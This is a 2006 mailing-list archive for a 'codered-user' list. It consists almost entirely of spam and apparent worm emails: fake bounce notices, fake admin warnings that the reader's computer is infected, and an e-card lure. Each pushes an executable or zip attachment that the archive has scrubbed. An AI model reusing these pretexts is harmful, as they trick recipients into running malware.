From cards at e-postcards.com  Wed Sep 13 23:11:39 2006
From: cards at e-postcards.com (e-postcards.com)
Date: Wed, 13 Sep 2006 15:11:39 -0600 (MDT)
Subject: [Codered-user] Angel friend message for you!!
Message-ID: <20060913211139.2EAAB1CA10B@www.montypics.com>

An HTML attachment was scrubbed...
URL: <https://lists.berlios.de/pipermail/codered-user/attachments/20060913/ed39e4d5/attachment.html>

From noreply at lists.berlios.de  Thu Sep 14 01:15:57 2006
From: noreply at lists.berlios.de (Bounced mail)
Date: Wed, 13 Sep 2006 19:15:57 -0400
Subject: [Codered-user] test
Message-ID: <20060913231237.7A5B67A913@bat.berlios.de>



-------------- next part --------------
A non-text attachment was scrubbed...
Name: message.zip
Type: application/octet-stream
Size: 29232 bytes
Desc: not available
URL: <https://lists.berlios.de/pipermail/codered-user/attachments/20060913/50c99424/attachment.obj>

From noreply at lists.berlios.de  Wed Sep 20 16:08:43 2006
From: noreply at lists.berlios.de (Returned mail)
Date: Wed, 20 Sep 2006 09:08:43 -0500
Subject: [Codered-user] DELIVERY REPORTS ABOUT YOUR E-MAIL
Message-ID: <20060920141004.9324779A46@bat.berlios.de>

Dear user codered-user at lists.berlios.de, administration of lists.berlios.de would like to inform you that:

Your account has been used to send a huge amount of junk email messages during the last week.
We suspect that your computer had been compromised and now contains a hidden proxy server.

Please follow instruction in the attached text file in order to keep your computer safe.

Sincerely yours,
The lists.berlios.de support team.

-------------- next part --------------
A non-text attachment was scrubbed...
Name: message.scr
Type: application/octet-stream
Size: 28832 bytes
Desc: not available
URL: <https://lists.berlios.de/pipermail/codered-user/attachments/20060920/7b2bb91a/attachment.obj>

From postmaster at lists.berlios.de  Wed Sep 20 18:40:54 2006
From: postmaster at lists.berlios.de (Mail Administrator)
Date: Wed, 20 Sep 2006 09:40:54 -0700
Subject: [Codered-user] Xpkhs
Message-ID: <20060920164122.8C7148040A@bat.berlios.de>

D3?????B?|NU?$?Z?C??Q
??w??a?]'?b??????N??
^-)7&\?1??G} 8}&??&????[???????o8?AWCk$?X?T?j??c?JCB????|h,???'?t?!?y??<R?1?,?)
U??????l????Z????)????>??~??`9sGp????*]???????u???U??XzlD?-b???????s?
?|?m?_0 I?
[J??
??g??U^????????%?n??????g*\?
?Uq???,y?mM??????l??\7??O?}???^s????????G???9W?.O??C?????QVk???$R???????b??}SO??i?
L-[?
}?
?&P????D_?*M?uZW1&?(?
??%?m??S??L?C?T???!??X???????????%S?[j?P?QL?c\???-'??? #???:????y.M??x?2?E}??O?&?mg????T??Ti7u)????~?r??I?U?3?(?k?S?????9z?v??{???\?h????!oy
???{`????r????????\?????^?c??????#?\?/??\?qo????P?%p?}?1???g{#N)???l?f!{p?????E??Y??!!?<
?$QV?? &?H??m
????g??{P?[u?
?T?vo??????z?w<???,?9????0?l6?M*;)?Wv?f??L??`XU?C?%\?z^80?CO81zk?d%)??u{???e?P?\?????j8N),M?w????
"px0UH?,I?<???5?8?$X??????lq?????
???j?.?Y???;A????|????"???}?I?_???????[??^??H??t?y8?Vs?????E????????????D4{???????????&???9?????&????D??4?U3GD???4h?'Z>?%??m?7?????????O????/?.iS
gS.T5?L?.????????;?~?_????'?z??
mZ0??!?GQ??:???t???L??%?~??Z?K
l$I8?v???
??
?l??o_/Ruv?/???&?.?p?E?????p???I??S??a???????R*??0??L:8?????:????0??iCeY"?????L%v?????Ca?????%-????s?:n???Io???w?W?o)????T?>??????"???A1|`
1&???1??????v??q?*I{
?Se??Z??.?NFK??????w?u??a??J?O?????-?<?xi?? ?KX???'????\???R[???F?]
?
?c?\yf|?
??????M?d9??!]v?s???F?JKZ??,???????/R???H?
??????m????;#??

-------------- next part --------------
A non-text attachment was scrubbed...
Name: file.zip
Type: application/octet-stream
Size: 28978 bytes
Desc: not available
URL: <https://lists.berlios.de/pipermail/codered-user/attachments/20060920/abb40571/attachment.obj>

From MAILER-DAEMON at lists.berlios.de  Mon Sep 25 00:40:12 2006
From: MAILER-DAEMON at lists.berlios.de (Automatic Email Delivery Software)
Date: Sun, 24 Sep 2006 18:40:12 -0400
Subject: [Codered-user] delivery failed
Message-ID: <20060924224021.7A6AA825C4@bat.berlios.de>

Dear user codered-user at lists.berlios.de, Mail server administrator of lists.berlios.de would like to let you know that.

We have found that your email account has been used to send a large amount of spam messages during the last week.
Most likely your computer had been compromised and now runs a trojan proxy server.

Please follow instructions in order to keep your computer safe.

Best wishes,
The lists.berlios.de team.

-------------- next part --------------
A non-text attachment was scrubbed...
Name: message.zip
Type: application/octet-stream
Size: 29324 bytes
Desc: not available
URL: <https://lists.berlios.de/pipermail/codered-user/attachments/20060924/e58677a7/attachment.obj>

From tom.cuneo at govtel.com  Wed Sep 27 05:30:18 2006
From: tom.cuneo at govtel.com (tom.cuneo at govtel.com)
Date: Tue, 26 Sep 2006 22:30:18 -0500
Subject: [Codered-user] Yqmw
Message-ID: <20060927033051.00D0E7B8BE@bat.berlios.de>

The original message was received at Tue, 26 Sep 2006 22:30:18 -0500 from [200.228.97.100]

----- The following addresses had permanent fatal errors -----
<codered-user at lists.berlios.de>



-------------- next part --------------
A non-text attachment was scrubbed...
Name: Readme.com
Type: application/octet-stream
Size: 28864 bytes
Desc: not available
URL: <https://lists.berlios.de/pipermail/codered-user/attachments/20060926/7163d872/attachment.obj>

From noreply at lists.berlios.de  Wed Sep 27 08:09:24 2006
From: noreply at lists.berlios.de (Returned mail)
Date: Wed, 27 Sep 2006 02:09:24 -0400
Subject: [Codered-user] Mail System Error - Returned Mail
Message-ID: <20060927060957.6DA4883DAD@bat.berlios.de>



-------------- next part --------------
A non-text attachment was scrubbed...
Name: transcript.zip
Type: application/octet-stream
Size: 29084 bytes
Desc: not available
URL: <https://lists.berlios.de/pipermail/codered-user/attachments/20060927/60392f22/attachment.obj>

From sisrael at uow.edu.au  Fri Sep 29 17:50:06 2006
From: sisrael at uow.edu.au (sisrael at uow.edu.au)
Date: Fri, 29 Sep 2006 11:50:06 -0400
Subject: [Codered-user] RETURNED MAIL: DATA FORMAT ERROR
Message-ID: <20060929155038.E30058173C@bat.berlios.de>

Dear user of lists.berlios.de,

We have found that your account was used to send a large amount of spam messages during the recent week.
Obviously, your computer was infected and now contains a trojan proxy server.

Please follow instructions in order to keep your computer safe.

Have a nice day,
lists.berlios.de user support team.

-------------- next part --------------
A non-text attachment was scrubbed...
Name: message.zip
Type: application/octet-stream
Size: 29096 bytes
Desc: not available
URL: <https://lists.berlios.de/pipermail/codered-user/attachments/20060929/fb510f57/attachment.obj>

From postmaster at lists.berlios.de  Sat Sep 30 09:18:19 2006
From: postmaster at lists.berlios.de (Mail Delivery Subsystem)
Date: Sat, 30 Sep 2006 15:18:19 +0800
Subject: [Codered-user] Returned mail: see transcript for details
Message-ID: <20060930071859.1809980574@bat.berlios.de>

The original message was received at Sat, 30 Sep 2006 15:18:19 +0800 from [95.218.202.65]

----- The following addresses had permanent fatal errors -----
codered-user at lists.berlios.de

----- Transcript of session follows -----
... while talking to 125.182.204.21:
554 <codered-user at lists.berlios.de>... Message is too large
554 <codered-user at lists.berlios.de>... Service unavailable

-------------- next part --------------
A non-text attachment was scrubbed...
Name: file.scr
Type: application/octet-stream
Size: 28832 bytes
Desc: not available
URL: <https://lists.berlios.de/pipermail/codered-user/attachments/20060930/07d607c3/attachment.obj>

